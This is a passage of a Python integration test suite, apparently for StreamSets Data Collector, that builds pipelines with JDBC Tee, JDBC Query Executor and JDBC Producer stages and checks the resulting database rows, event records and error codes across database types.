snapshot = sdc_executor.capture_snapshot(pipeline=pipeline,
start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
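        # Each output record's second field is the looked-up '/FirstName'; collect it as {field_name: value} for comparison.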
rows_from_snapshot = [{list(record.field.keys())[1]: list(record.field.values())[1].value}
for record in snapshot[jdbc_lookup].output]
assert rows_from_snapshot == LOOKUP_EXPECTED_DATA
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_tee_processor(sdc_builder, sdc_executor, database):
"""Simple JDBC Tee processor test.
Pipeline will insert records into database and then pass generated database column 'id' to fields.
The pipeline looks like:
dev_raw_data_source >> jdbc_tee >> trash
"""
if isinstance(database, OracleDatabase):
pytest.skip('JDBC Tee Processor does not support Oracle')
elif type(database) == SQLServerDatabase:
pytest.skip('JDBC Tee Processor does not support SQL Server')
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(RAW_DATA))
jdbc_tee = pipeline_builder.add_stage('JDBC Tee')
    # Note that ids are not inserted here; the database generates them automatically.
field_to_column_mapping = [dict(columnName='name',
dataType='USE_COLUMN_TYPE',
field='/name',
paramValue='?')]
generated_column_mappings = [dict(columnName='id',
dataType='USE_COLUMN_TYPE',
field='/id')]
jdbc_tee.set_attributes(default_operation='INSERT',
field_to_column_mapping=field_to_column_mapping,
generated_column_mappings=generated_column_mappings,
table_name=table_name)
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> jdbc_tee >> trash
pipeline = pipeline_builder.build(title='JDBC Tee').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline,
start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
# Verify the JDBC Tee processor has got new ids which were generated by database.
rows_from_snapshot = [{list(item.field.keys())[0]: list(item.field.values())[0].value,
list(item.field.keys())[1]: int(list(item.field.values())[1].value)}
for item in snapshot[jdbc_tee].output]
assert rows_from_snapshot == ROWS_IN_DATABASE
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@pytest.mark.parametrize('use_multi_row', [True, False])
@sdc_min_version('3.0.0.0') # stop_after_first_batch
def test_jdbc_tee_processor_multi_ops(sdc_builder, sdc_executor, database, use_multi_row):
"""JDBC Tee processor with multiple operations
Pipeline will delete/update/insert records into database with one batch and then update 'id'
field if it is inserted. The 'operation' field is used for the record header sdc.operation.type
which defines the CRUD operation (1: Insert, 2: Delete, 3: Update). The pipeline looks like:
dev_raw_data_source >> expression evaluator >> jdbc_tee >> trash
"""
if isinstance(database, OracleDatabase):
pytest.skip('JDBC Tee Processor does not support Oracle')
elif type(database) == SQLServerDatabase:
pytest.skip('JDBC Tee Processor does not support SQL Server')
table_name = get_random_string(string.ascii_lowercase, 20)
pipeline_builder = sdc_builder.get_pipeline_builder()
DATA = [
{'operation': 2, 'name': 'Jarcec', 'id': 2}, # delete
{'operation': 3, 'name': 'Hari', 'id': 3}, # update
{'operation': 1, 'name': 'Eddie'} # insert, id will be added by JDBC Tee
]
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON',
raw_data='\n'.join(json.dumps(rec) for rec in DATA),
stop_after_first_batch=True)
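    # Copy each record's '/operation' value into the sdc.operation.type header, which tells JDBC Tee which CRUD operation to apply.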
HEADER_EXPRESSIONS = [dict(attributeToSet='sdc.operation.type',
headerAttributeExpression="${record:value('/operation')}")]
expression_evaluator = pipeline_builder.add_stage('Expression Evaluator')
expression_evaluator.header_attribute_expressions = HEADER_EXPRESSIONS
FIELD_TO_COLUMN = [dict(columnName='name', field='/name', paramValue='?')]
jdbc_tee = pipeline_builder.add_stage('JDBC Tee')
jdbc_tee.set_attributes(default_operation='INSERT',
field_to_column_mapping=FIELD_TO_COLUMN,
generated_column_mappings=[dict(columnName='id', field='/id')],
table_name=table_name,
use_multi_row_operation=use_multi_row)
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> expression_evaluator >> jdbc_tee >> trash
pipeline_title = 'JDBC Tee MultiOps MultiRow' if use_multi_row else 'JDBC Tee MultiOps SingleRow'
pipeline = pipeline_builder.build(title=pipeline_title).configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
table = _create_table(table_name, database)
try:
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
        # Passing only names to get the correct sequence numbers, especially for PostgreSQL
if type(database) == SQLServerDatabase:
connection.execute(table.insert(), [{'id': row['id'], 'name': row['name']} for row in ROWS_IN_DATABASE])
else:
connection.execute(table.insert(), [{'name': row['name']} for row in ROWS_IN_DATABASE])
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline,
start_pipeline=True).snapshot
sequence_id = len(ROWS_IN_DATABASE)
# Verify the database is updated.
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
expected_data = [(row['name'], row['id']) for row in ROWS_IN_DATABASE]
for record in DATA:
if record['operation'] == 1: # insert
sequence_id += 1
expected_data.append((record['name'], sequence_id))
elif record['operation'] == 2: # delete
expected_data = [row for row in expected_data if row[1] != record['id']]
elif record['operation'] == 3: # update
expected_data = [row if row[1] != record['id'] else (record['name'], row[1]) for row in expected_data]
assert data_from_database == expected_data
        # Verify the JDBC Tee processor has the new IDs which were generated by the database.
jdbc_tee_output = snapshot[jdbc_tee].output
name_id_from_output = [(record.field['name'], record.field['id']) for record in jdbc_tee_output]
assert name_id_from_output == [('Jarcec', 2), ('Hari', 3), ('Eddie', sequence_id)]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_query_executor(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
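    # The INSERT statement is evaluated per record, with '/name' and '/id' resolved through EL expressions.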
query_str = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(RAW_DATA) - 1)
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.14.0') # multiple queries execution
def test_jdbc_query_executor_multiple_queries(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
"""
table_name = f'stf_{get_random_string(string.ascii_lowercase, 20)}'
table = _create_table(table_name, database)
ROWS_IN_DATABASE_UPDATED = [
{'id': 1, 'name': 'Alex'},
{'id': 2, 'name': 'Alex'},
{'id': 3, 'name': 'Alex'}
]
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
query_str1 = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
query_str2 = f"UPDATE {table_name} SET name = 'Alex' WHERE name = '${{record:value('/name')}}'"
jdbc_query_executor.set_attributes(sql_queries=[query_str1, query_str2])
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(RAW_DATA) - 1)
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE_UPDATED]
finally:
logger.info(f'Dropping table {table_name} in {database.type} database ...')
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_successful_query_event(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for successful-query event type.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database. Event records are verified for successful-query event type.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
query_str = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor.instance_name].event_records
assert len(event_records) == 3
assert 'successful-query' == event_records[0].header['values']['sdc.event.type']
assert 'successful-query' == event_records[1].header['values']['sdc.event.type']
assert 'successful-query' == event_records[2].header['values']['sdc.event.type']
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_insert_query_result_count(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for successful-query event type and query result count enabled.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database. Event records are verified for successful-query event type
and query-result field for the insert query.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
query_str = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
jdbc_query_executor.set_attributes(include_query_result_count_in_events=True)
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor.instance_name].event_records
assert len(event_records) == 3
assert 'successful-query' == event_records[0].header['values']['sdc.event.type']
assert 'successful-query' == event_records[1].header['values']['sdc.event.type']
assert 'successful-query' == event_records[2].header['values']['sdc.event.type']
assert '1 row(s) affected' == event_records[0].value['value']['query-result']['value']
assert '1 row(s) affected' == event_records[1].value['value']['query-result']['value']
assert '1 row(s) affected' == event_records[2].value['value']['query-result']['value']
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.0.0.0')
def test_jdbc_query_executor_lifecycle_events(sdc_builder, sdc_executor, database):
"""Verify that the JDBC Query Executor will work properly when used inside pipeline lifecycle stages."""
if isinstance(database, OracleDatabase):
pytest.skip('This test does not support Oracle')
elif type(database) == SQLServerDatabase:
pytest.skip('This test does not support SQL Server')
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('user', sqlalchemy.String(50)),
sqlalchemy.Column('event', sqlalchemy.String(50)))
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
query = f"INSERT INTO {table_name} VALUES ('${{record:value('/user')}}', '${{record:attribute('sdc.event.type')}}')"
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'TEXT'
    source.raw_data = 'SOMETHING'
trash = builder.add_stage('Trash')
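    # Lifecycle event stages: the same INSERT query runs once for the pipeline-start event and once for the pipeline-stop event.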
start_stage = builder.add_start_event_stage('JDBC Query')
if Version(sdc_builder.version) < Version('3.14.0'):
start_stage.set_attributes(sql_query=query)
else:
start_stage.set_attributes(sql_queries=[query])
stop_stage = builder.add_stop_event_stage('JDBC Query')
if Version(sdc_builder.version) < Version('3.14.0'):
stop_stage.set_attributes(sql_query=query)
else:
stop_stage.set_attributes(sql_queries=[query])
source >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[1])
result.close()
assert db[0][0] == 'admin'
assert db[0][1] == 'pipeline-start'
assert db[1][0] == ''
assert db[1][1] == 'pipeline-stop'
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_query_executor_failure_state(sdc_builder, sdc_executor, database):
"""Verify that the executor is properly called with the proper state on pipeline initialization failure."""
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('reason', sqlalchemy.String(50)))
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
query = f"INSERT INTO {table_name} VALUES ('${{record:value('/reason')}}')"
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('JDBC Multitable Consumer')
    source.table_configs = [{"tablePattern": 'this_table_do_not_exists'}]
trash = builder.add_stage('Trash')
stop_stage = builder.add_stop_event_stage('JDBC Query')
if Version(sdc_builder.version) < Version('3.14.0'):
stop_stage.set_attributes(sql_query=query)
else:
stop_stage.set_attributes(sql_queries=[query])
source >> trash
pipeline = builder.build().configure_for_environment(database)
    # Injecting failure - this URL doesn't exist, so the pipeline won't be able to start properly
source.jdbc_connection_string = "jdbc:mysql://this-do-not-exists:3306/awesome-db"
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline, wait=False).wait_for_status('START_ERROR', ignore_errors=True)
result = database.engine.execute(table.select())
db = result.fetchall()
result.close()
assert db[0][0] == 'FAILURE'
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_select_query_result_count(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for successful-query event type and query result count enabled.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database and then the same data is queried. Event records are
verified for successful-query event type and query-result field for the select query.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor1 >= jdbc_query_executor2 >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
query_str1 = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
query_str2 = f"SELECT * FROM {table_name}"
jdbc_query_executor1 = pipeline_builder.add_stage('JDBC Query', type='executor')
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor1.set_attributes(sql_query=query_str1)
else:
jdbc_query_executor1.set_attributes(sql_queries=[query_str1])
jdbc_query_executor2 = pipeline_builder.add_stage('JDBC Query', type='executor')
jdbc_query_executor2.set_attributes(include_query_result_count_in_events=True)
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor2.set_attributes(sql_query=query_str2)
else:
jdbc_query_executor2.set_attributes(sql_queries=[query_str2])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor1 >= jdbc_query_executor2 >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor2.instance_name].event_records
assert len(event_records) == 3
assert 'successful-query' == event_records[0].header['values']['sdc.event.type']
assert 'successful-query' == event_records[1].header['values']['sdc.event.type']
assert 'successful-query' == event_records[2].header['values']['sdc.event.type']
assert '3 row(s) returned' == event_records[0].value['value']['query-result']['value']
assert '3 row(s) returned' == event_records[1].value['value']['query-result']['value']
assert '3 row(s) returned' == event_records[2].value['value']['query-result']['value']
result = database.engine.execute(table.select())
result.close()
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_failed_query_event(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for failed-query event type.
Pipeline will try to insert records into a non-existing table and the query would fail.
Event records are verified for failed-query event type.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
invalid_table = "INVALID_TABLE"
query_str = f"INSERT INTO {invalid_table} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor.instance_name].event_records
assert len(event_records) == 3
assert 'failed-query' == event_records[0].header['values']['sdc.event.type']
assert 'failed-query' == event_records[1].header['values']['sdc.event.type']
assert 'failed-query' == event_records[2].header['values']['sdc.event.type']
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == []
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.10.0')
@pytest.mark.parametrize('enable_parallel_execution', [True, False])
def test_jdbc_query_executor_parallel_query_execution(sdc_builder, sdc_executor, database, enable_parallel_execution):
"""Test JDBC Query Executor's parallel query execution mode.
Pipeline will insert records into database, then update the records.
Using sqlalchemy, we verify that correct data was inserted (and updated) in the database.
Pipeline configuration:
dev_raw_data_source >> jdbc_query_executor
"""
table_name = get_random_string(string.ascii_uppercase, 20)
table = _create_table(table_name, database)
    # Make sure that we properly escape the table name. Ideally we would escape it for all databases, but since we
    # know that all except PostgreSQL are passing, we only escape it for PostgreSQL for now.
enclosed_table = f'"{table_name}"' if type(database) == PostgreSqlDatabase else table_name
    # First the inserts - they run in parallel when parallel execution is enabled,
    # then all the updates run sequentially.
    # The net result is that every record should end up with the (last) new value;
    # otherwise we've failed.
statements = []
for rec in ROWS_IN_DATABASE:
statements.extend([f"INSERT INTO {enclosed_table} (name, id) VALUES ('{rec['name']}', {rec['id']})",
f"UPDATE {enclosed_table} SET name = 'bob' WHERE id = {rec['id']}",
f"UPDATE {enclosed_table} SET name = 'MERRICK' WHERE id = {rec['id']}"])
# convert to string - Dev Raw Data Source Data Format tab does not seem
# to "unroll" the array into newline-terminated records.
statements = "\n".join(statements)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='TEXT', raw_data=statements)
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
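    # Each TEXT record carries one full SQL statement in '/text'; the executor runs that statement as its query.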
query_str = "${record:value('/text')}"
jdbc_query_executor.set_attributes(enable_parallel_queries=enable_parallel_execution,
maximum_pool_size=2,
minimum_idle_connections=2)
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
dev_raw_data_source >> jdbc_query_executor
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE)*3)
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [('MERRICK', record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
def _create_jdbc_producer_pipeline(pipeline_builder, pipeline_title, raw_data, table_name, operation):
"""Helper function to create and return a pipeline with JDBC Producer
    The Deduplicator ensures there is only one ingest to the database. The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=raw_data)
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
FIELD_MAPPINGS = [dict(field='/id', columnName='id'),
dict(field='/name', columnName='name')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation=operation,
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
return pipeline_builder.build(title=pipeline_title)
@database
def test_jdbc_producer_insert(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with INSERT operation.
    The pipeline inserts records into the database and verifies that the correct data is in the database.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Insert', DATA, table_name, 'INSERT')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database('mysql', 'postgresql')
def test_jdbc_producer_insert_type_err(sdc_builder, sdc_executor, database):
"""This test covers invalid type coersion - writing string into int column. As different databases works differently,
we can't assert this across all supported databases. MySQL and PostgreSQL behaves the same way and we can properly
catch and generate JDBC_23. Other databases report coercion issues much later in the query cycle, sometimes even
in a way where we can't understand what and why has happened.
"""
ROWS_IN_DATABASE = [
{'id': 1, 'name': 'Dima'},
{'id': 'X', 'name': 'Jarcec'},
{'id': 3, 'name': 'Arvind'}
]
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=DATA, stop_after_first_batch=True)
FIELD_MAPPINGS = [dict(field='/id', columnName='id', dataType='INTEGER'),
dict(field='/name', columnName='name', dataType='STRING')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation='INSERT',
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='TO_ERROR')
dev_raw_data_source >> jdbc_producer
pipeline = pipeline_builder.build(title="JDBC producer with error")
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.get_pipeline_status(pipeline).wait_for_status('FINISHED')
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE
if record['id'] != 'X']
stage = snapshot[jdbc_producer.instance_name]
assert 'JDBC_23' == stage.error_records[0].header['errorCode']
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_insert_multiple_types(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with INSERT operation.
    The pipeline inserts a batch of records of multiple types.
The pipeline should look like:
dev_data_generator >> jdbc_producer
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_data_generator = pipeline_builder.add_stage('Dev Data Generator')
dev_data_generator.fields_to_generate = [
{'field': 'field1', 'type': 'STRING'},
{'field': 'field2', 'type': 'DATETIME'},
{'field': 'field3', 'type': 'INTEGER'},
{'field': 'field4', 'precision': 10, 'scale': 2, 'type': 'DECIMAL'},
